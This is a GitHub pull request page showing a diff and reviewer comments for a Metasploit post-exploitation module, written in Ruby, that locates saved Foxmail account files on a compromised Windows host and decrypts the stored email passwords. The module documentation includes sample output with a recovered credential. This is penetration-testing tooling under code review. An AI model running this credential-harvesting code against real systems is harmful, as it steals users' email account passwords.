Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Gather foxmail password #14218

Closed
wants to merge 13 commits into from
Closed

Gather foxmail password #14218

Show file tree
Hide file tree
Changes from 2 commits
Commits
Show all changes
13 commits
Select commit Hold shift + click to select a range
6bc62c1
add gather foxmail pasword module
cn-kali-team Oct 4, 2020
f05fda1
add doc
cn-kali-team Oct 4, 2020
e464b6d
update documentation
cn-kali-team Nov 15, 2020
402bc94
update code
cn-kali-team Nov 15, 2020
b53f088
update code
cn-kali-team Nov 22, 2020
b70cc85
update documentation
cn-kali-team Nov 22, 2020
0342ab2
Add a function to determine whether a folder exists
cn-kali-team Nov 22, 2020
ab2252f
fix
cn-kali-team Nov 22, 2020
fac785a
Apply the last bit of the documentation fixes and make sure it is too…
gwillcox-r7 Nov 25, 2020
6212518
Fix up more stuff noticed during the review including several cases w…
gwillcox-r7 Nov 25, 2020
66fc1f7
undo
cn-kali-team Nov 28, 2020
407020e
Update modules/post/windows/gather/credentials/foxmail.rb
cn-kali-team Nov 28, 2020
fcea651
Add description only version 7. X is supported
cn-kali-team Dec 3, 2020
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
10 changes: 5 additions & 5 deletions documentation/modules/post/windows/gather/credentials/foxmail.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
## Verification Steps

1. Download the latest installer of Foxmail.
2. Use foxmail to login email server.
1. Download and install Foxmail package from the official website: https://foxmail.com/win/en.
2. Use FoxMail to log into a mail server.
3. Remember to save the account password.
4. Get a `meterpreter` session on a Windows host.
5. Do: ```run post/windows/gather/credentials/foxmail```
Expand All @@ -11,10 +11,10 @@

**ACCOUNT_PATH**

- Specifies the Account directory path for Foxmail
- Specifies the account directory path for Foxmail

## Scenarios

### FoxMail 7.2 on Windows
```
[*] Search account files on C:\Foxmail 7.2\Storage
[+] Parsing configuration file: 'C:\Foxmail 7.2\Storage\kali-team@qq.com\Accounts\Account.rec0', please wait.
Expand All @@ -31,7 +31,7 @@ kali-team@qq.com smtp.qq.com 465 true fjcqkkeqbuwedd

```

* Specify ** **ACCOUNT_PATH**
### FoxMail 7.2 on Windows, with ACCOUNT_PATH specified

```
msf6 post(windows/gather/credentials/foxmail) > set account_path "C:\Foxmail 7.2\Storage\"
Expand Down
30 changes: 14 additions & 16 deletions modules/post/windows/gather/credentials/foxmail.rb
View file
Open in desktop
Original file line number Diff line number Diff line change
Expand Up @@ -12,8 +12,9 @@ def initialize(info = {})
info,
'Name' => 'Windows Gather Foxmail Passwords',
'Description' => %q{
This module can decrypt the password of foxmail,
if the user chooses to remember the password.
The module can decrypt the password of the email account saved by Foxmail.
From the Storage\<email>\Accounts\Account.rec0,in the installation directory of Foxmail
The ciphertext is read from the file and decrypted by the dislocation XOR algorithm.
},
'License' => MSF_LICENSE,
'References' => [
Expand All @@ -29,7 +30,7 @@ def initialize(info = {})
)
register_options(
[
OptString.new('ACCOUNT_PATH', [ false, 'Specifies the Account directory path for Foxmail']),
OptString.new('ACCOUNT_PATH', [ false, 'The account directory path to use when grabbing account details from Foxmail']),
]
)
end
Expand All @@ -49,8 +50,6 @@ def find_string(file, offset, length = 0)
end
end

def pass; end

def enum_session_file(fpath)
account_paths = []
session.fs.dir.foreach(fpath) do |mail_addr|
Expand All @@ -64,7 +63,7 @@ def enum_session_file(fpath)

# enum session file
account_paths.each do |file_name|
file = read_file(file_name)
file = read_file(file_name) if session.fs.file.exist?(file_name)
if file.nil? || file.empty?
next
end
Expand All @@ -84,14 +83,13 @@ def enum_session_file(fpath)
while index < file.length
if (file[index] && file[index] > "\x20" && file[index] < "\x7f" && file[index] != "\x3d")
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Again if \x20, aka space, is a valid character, then this should be >=.

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Need some clarify here, what is the expected range of characters you are looking at here? If this is in the format of asdf123=asdf23423 then I would expect only alpha-numberic characters to to be included in this range but I see your also including characters such as <, !, @ and other characters here that seem a little odd given that you specifically try not to match on =. Just would like to double check this logic as seems somewhat odd to me.

buffer += file[index]
if ['Email', 'IncomingServer', 'OutgoingServer', 'Password'].include?(buffer)
email_info[buffer] = find_string(file, index + offset) || nil
elsif ['IncomingPort', 'OutgoingPort'].include?(buffer)
email_info[buffer] = find_string(file, index + 5, 2) || nil
elsif ['InComingSSL', 'OutgoingSSL'].include?(buffer)
email_info[buffer] = find_string(file, index + 5, 2) == 1 || false
else
pass
case buffer
when 'Email', 'IncomingServer', 'OutgoingServer', 'Password'
email_info[buffer] = find_string(file, index + offset) || nil
when 'IncomingPort', 'OutgoingPort'
email_info[buffer] = find_string(file, index + 5, 2) || nil
when 'InComingSSL', 'OutgoingSSL'
email_info[buffer] = find_string(file, index + 5, 2) == 1 || false
gwillcox-r7 marked this conversation as resolved.
Show resolved Hide resolved
end
else
buffer = ''
Expand Down Expand Up @@ -158,7 +156,7 @@ def foxmail_crypto(version, ciphertext)
end

def run
print_status("Gather Foxmail Passwords on #{sysinfo['Computer']}")
print_status("Gathering Foxmail passwords on #{sysinfo['Computer']}")
# get session file path
foxmail_path = ''
if datastore['ACCOUNT_PATH'].to_s.empty?
Expand All @@ -168,7 +166,7 @@ def run
else
foxmail_path = expand_path(datastore['ACCOUNT_PATH'])
end
if foxmail_path
if !foxmail_path.to_s.empty?
result = enum_session_file(foxmail_path)
columns = [
'Email',
Expand Down